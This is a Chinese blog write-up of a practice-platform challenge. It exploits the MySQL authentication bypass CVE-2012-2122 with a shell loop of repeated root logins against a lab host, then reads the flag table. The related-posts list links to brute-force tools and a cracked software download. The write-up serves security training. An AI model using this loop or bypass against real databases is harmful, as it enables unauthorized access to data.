安鸾渗透实战平台——暴力破解(Mysql暴力破解 (200分)

已于 2022-03-02 16:34:09 修改
阅读量2.3k 收藏 3
点赞数
分类专栏: 安鸾渗透实战平台 文章标签: struts 安全 web安全
于 2022-03-02 16:32:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50985113/article/details/122729064
版权

漏洞环境

安鸾渗透实战平台——暴力破解(Mysql暴力破解)
kali虚拟机

分析题目

在这里插入图片描述
1、从图上作者告诉我们要使用MySQL漏洞,最开始没明白是什么意思,去拿MSF的mysql爆破模块去测试了一下,得到密码,拿去使用时出现了问题
在这里插入图片描述提示密码错误:
在这里插入图片描述

又试了几次发现每次爆破的密码都不一样
在这里插入图片描述
在这里插入图片描述

题目提示了,利用漏洞,以前有个MySQL的漏洞,这里直接使用linux的for循环去测试

Mysql 身份认证绕过漏洞(CVE-2012-2122)
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

for i in `seq 1 1000`; do mysql -uroot -paaaaa -h 118.190.133.35 -P3308 ; done

for : 利用linux的shell创造一个for循环
i : 循环的变量
seq 1 1000:表示循环是从1-1000
do:执行
mysql -uroot -paaaaa:mysql的登录命令,意思是用户名是root,密码是aaaaa
-h 118.190.133.35 -P3308:-h是IP ;-P是端口
done:表示循环结束

在这里插入图片描述

进去了,看一下表的信息,发现有个test
在这里插入图片描述
没有,看看whalwl把

use whalwl;
show tables;

在这里插入图片描述

select * from flag;

在这里插入图片描述

阿文、...
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python写的PHPMyAdmin暴力破解工具代码
12-25
PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。 #!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url...
Mysql 身份认证绕过漏洞(CVE-2012-2122)
m0_63521991的博客
10-19 818
CVE-2012-2122 是 MySQL 数据库中的一个身份认证绕过漏洞,也被称为 "MySQL Authentication Bypass" 漏洞。该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,使得攻击者可以绕过身份认证并以未经授权的方式访问数据库。
安鸾靶场 宽字符注入02 靶场练习 详细过程及解决问题笔记
AAAAAAAAAAAA66的博客
02-06 3340
题目 网站URL ECSHOP演示站 - Powered by ECShop 目录 笔记 过程 进入sql注入页面 问题 判断闭合符 sql注入下的模糊查询 right 语法爆字段值 笔记 对现在我来说难度其实不大,但题目考察的一些细节要求比较高。 首先把我遇到的问题 一 一 列出。(在下面解题的过程会一 一 解决) 题目虽然是叫宽字符注入,但实际考察的是报错注入 (挂羊头卖狗肉) 这个网站很大,注入点很难找(我也是看一位师傅的write up) 自己没有...
Python 渗透测试:MySQL 数据库 弱密码测试.(3306 端口)
最新发布
网络安全领域___专研者.
05-17 652
MySQL 是一种开源的关系型数据库管理系统(RDBMS)。它是目前世界上最流行的数据库之一,被广泛应用于各种类型的网站和应用程序中。MySQL 数据库爆破是一种非法和危险的黑客攻击手段。它指的是通过暴力猜测密码的方式,试图获取未授权访问 MySQL 数据库的行为。
利用MySQL暴力破解实现远程控制
末班车的博客
03-12 1949
MySQL数据库漏洞发现与利用
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4670
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
mysql身份认证绕过漏洞复现(CVE-2012-2122)
weixin_53730939的博客
03-12 1339
mysql身份认证绕过漏洞复现(CVE-2012-2122)
phpMyAdmin(MySQL)暴力破解工具v1.3.rar
06-18
目前phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此工具仅供网友技术学习交流使用,请勿使用于非法用途。
PHP暴力破解MYSQL口令【无字典】
09-10
PHP无字典暴力跑服务器MYSQL口令,用记事本打开文件,自己添加或删除字符,数字除0外不用添加,代码不是很完善,变量数字会自动加入到字符中。测试即知。
Django入门实战项目——路灯后台管理系统
03-14
管理员通过MySQL数据库添加管理员操作添加管理员用户,然后管理员通过Web后台网页登录界面进行管理员账号登陆,进入主界面后可以从左侧导航栏选择页面功能,页面功能包含首页信息、用户管理、路灯管理、故障管理...
dbForge Studio for MySQL 8.0.124 官网最新破解版
12-03
dbForge Studio for MySQL是一个在Windows平台被广泛使用的MySQL客户端,它能够使MySQL开发人员和管理人员在一个方便的环境中与他人一起完成创建和执行查询,开发和调试MySQL程序,自动化管理MySQL数据库对象等工作...
Mysql数据库如何限制密码重试次数,避免密码被暴力破解
白杨Shayne的博客
05-14 585
【代码】Mysql数据库如何限制密码重试次数,避免密码被暴力破解
Kali系统MSF模块暴力破解MySQL弱口令漏洞
mooyuan的博客
11-24 8781
攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求被攻击的服务器开启了3306端口号。
mysql 弱口令暴力破解本地渗透测试
m0_46827210的博客
04-14 4745
文章目录环境配置主机数据库使用 Hydra 工具进行暴力破解使用 metsploit 暴力破解基本模块基本命令 环境配置 主机 靶机: 本地Linux服务器虚拟机 + phpstudy 攻击主机:本地 Kali 虚拟机 配置好网络让主机之间相互可以通信 数据库 数据库版本:mysql 5.5.62 开启 mysql 远程连接 ,否则攻击主机无法建立与靶机数据库连接 我是直接在小皮面板中开启 修改 mysql 最大错误连接数量,默认为 100 ,改为 1000, 方便暴力破解
1-Web安全——浅谈暴力破解
网络安全
09-10 1333
1. 暴力破解攻击 暴力破解是一种针对密码破译的测试方法,简单来说就是在不知道用户名或密码的情况下,通过穷举法将密码逐个推算比较,直到找到真正的密码为止。这是最原始,粗暴的破解方式,根据运算能力,破解密码是非常耗时的。 攻击者在进行渗透测试时,刚开始可能不会直接采取暴力破解方式,一般攻击者可能对该程序“没办法”的时候才会采取这种手段。 2. C/S架构暴力破解 所谓C/S架构就是开发中经常提到的客户端与服务端架构,常用的ssh,sql server,mysql等服务会提供一个高权限的管理..
安鸾之基础题系列&暴力破解系列部展示
柠鹿的轨迹
06-12 256
1. 0x00 前言 2. 0x01 基础题 2.1. 1、BurpSuite抓包 2.2. 2、kali系统安装 3. 0x02 暴力破解 3.1. 1、ftp服务破解 3.2. 2、telnet服务破解 3.3. 3、Mysql暴力破解 3.4. 4、登录表单破解 3.5. 5、一句话密码破解 3.6. 6、SSH离线破解 3.7. 7、wordpress后台破解 4. 0x03 后记.........
安鸾渗透telnet暴力破解
LHBD_R的博客
07-28 1402
1.telnet破解账号密码 题目domain:www.whalwl.icu port:2323 给我们了一个密码本,并且旁边给了一个让我们确认是否文件完整性的hash值,下载好密码本后查看hash值是否一致。 确认文件完整性完整,现在可以利用各种渗透工具来尝试爆破telnet 2.获取ip地址,ping所给的domain,来获取ip,获取到的ip地址为118.190.133.35 3获取到ip地址后,打开kali,准备好密码字典与用户字典,因为这里没有给我们字典...
安鸾复现笔记_One
柠鹿的轨迹
11-02 1416
目录 0x00 前言 0x01 基础题 1、BurpSuite抓包 2、kali系统安装 0x02 暴力破解 1、ftp服务破解 2、telnet服务破解 3、Mysql暴力破解 4、登录表单破解 5、一句话密码破解 6、SSH离线破解 7、wordpress后台破解 0x03 后记 0x00 前言 很简单,但是,你行吗? --涂寐 注:本教程仅供学习参考,请勿用在非法途径上,违者后果自负,与笔者无关。 0x01 基础题 1、BurpS...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值